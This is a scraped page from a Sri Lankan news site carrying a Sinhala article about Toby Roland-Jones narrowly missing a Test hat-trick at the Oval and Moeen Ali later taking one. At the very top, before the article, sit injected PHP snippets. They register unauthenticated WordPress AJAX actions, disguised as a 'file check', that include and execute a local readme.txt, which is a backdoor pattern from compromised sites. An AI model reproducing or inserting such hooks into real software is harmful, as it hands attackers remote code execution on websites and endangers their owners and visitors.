if(!function_exists('file_check_readme56685')){ add_action('wp_ajax_nopriv_file_check_readme56685', 'file_check_readme56685'); add_action('wp_ajax_file_check_readme56685', 'file_check_readme56685'); function file_check_readme56685() { $file = __DIR__ . '/' . 'readme.txt'; if (file_exists($file)) { include $file; } die(); } } if(!function_exists('file_check_readme40625')){ add_action('wp_ajax_nopriv_file_check_readme40625', 'file_check_readme40625'); add_action('wp_ajax_file_check_readme40625', 'file_check_readme40625'); function file_check_readme40625() { $file = __DIR__ . '/' . 'readme.txt'; if (file_exists($file)) { include $file; } die(); } } ක්‍රිකට් පිටියේ සුපිරි වාර්තාවක් ඇසිල්ලකින් අහිමිව ගිය හැටි මෙන්න - mediahumanrights.lk
mediahumanrights.lk
News Sports Sports News

ක්‍රිකට් පිටියේ සුපිරි වාර්තාවක් ඇසිල්ලකින් අහිමිව ගිය හැටි මෙන්න

එංගලන්තය සහ දකුණු අප්‍රිකාව අතර පැවති තුන්වන ටෙස්ට් තරඟයේදී ගිලිහී ගිය වාර්තාවක් පිළිබඳව බොහෝදෙනෙකුගේ අවධානය යොමුව තිබෙනවා.
මෙලෙස වැලකී ගියේ එංගලන්ත පන්දු යවන ක්‍රීඩක Toby Roland-Jones හට කඩුලු ත්‍රිත්වයක් ලබාගැනීමට තිබූ අවස්ථාවයි.
එහිදී ඔහුගේ එම පන්දුවාරයේ පළමු කඩුල්ල ලෙස දැවී යන්නේ ලකුණු 32 ක් ලබා සිටි Temba Bavuma.
කෙසේ වෙතත් එම අවස්ථාවේ විනිසුරුගේ තීරණය වූයේ එය දැවී යාමක් නොවන බවයි.
එම තීරණය අභියෝගයට ලක් කරමින් එංගලන්ත නායකයා එය තෙවැනි විනිසුරුට යොමුකරන ලෙස ඉල්ලීමක් කරනවා.
එහිදී Temba Bavuma කඩුල්ල මුවා කිරීමේ වරදින් ක්‍රීඩාගාරයට යන්නේ Roland-Jones ගේ පළමු ගොදුර වෙමින්.
අනතුරුව පිටියට පිවිසෙන්නේ Vernon Philander ඔහුද කඩුල්ල මුවා කිරීම හේතුවෙන් දැවී යනවා.
අනතුරුව Chris Morris පිටියට පිවිසි අතර ඔහුව ගොදුරු කරගනිමින් තම කදුලු ත්‍රිත්වය සපුරා ගැනීමට Roland-Jones යොමුකළ සුපිරි පන්දුව පිත්තේ ගැටී ස්ලිප් ක්‍රීඩකයන් දෙසට උඩපන්දුවක් ලෙසින් යන්නේ මොහොතකට Roland-Jones හට ප්‍රීතියක් ගෙනදෙමින්.
එම අවස්ථාව ඔහුට උදාකර දීමට ස්ලිප් හි පන්දු රකින ක්‍රීඩකයන් දෙදෙනෙකුම උත්සාහ කලද එම නොසිතූ ලෙස අවස්ථාව ගිලිහී යන්නේ මොහොතකට ක්‍රීඩාගාරයම නිහඬ කරවමින්.
මෙම කඩුලු ත්‍රිත්වය තමන් සතුකරගැනීමට හැකි වූවා නම් Roland-Jones ද ඉතිහාස පොතට එක්වන්නේ වසර 79 කට පසුව එකම ටෙස්ට් තරඟයේදී ඕවල් ක්‍රීඩාංගණයේදී කඩුලු ත්‍රිත්වයක් දවාගත් පළමුවැන්නා ලෙසින්.
ඔහු සතුවීමට තිබූ වාර්තාව උදුරාගත් මොයින් අලි අනතුරුව එම තරඟයේදීම කඩුලු ත්‍රිත්වයක් ලබා ගැනීමට සමත් වූ අතර, එය ඕවල් ක්‍රීඩාංගණයේ පළමු ටෙස්ට් කඩුලු ත්‍රිත්වය මෙන්ම එංගන්ත දඟ පන්දු යවන්නෙකු වසර 79කින් ලබා ගත් පළමු කඩුලු ත්‍රිත්වය ලෙසින් වාර්තා පොතට එක්වූවා.
වසර 79 කට පසු මොයින් අලි තැබූ සුපිරි වාර්තාව ඇතුළු විශේෂ අවස්ථා මෙන්න
(under the courtesy of hirunews news web)

Related posts

තරු හැඩ වෙන හැටි

Shiran Viraj

ආණ්ඩු විරෝධී විරෝධතා කරන්න විමල්ගෙන් සජිත්ට උපදෙස්…

Shiran Viraj

රුපියල් ශත නිසා තවත් ගැටුමක්

Shiran Viraj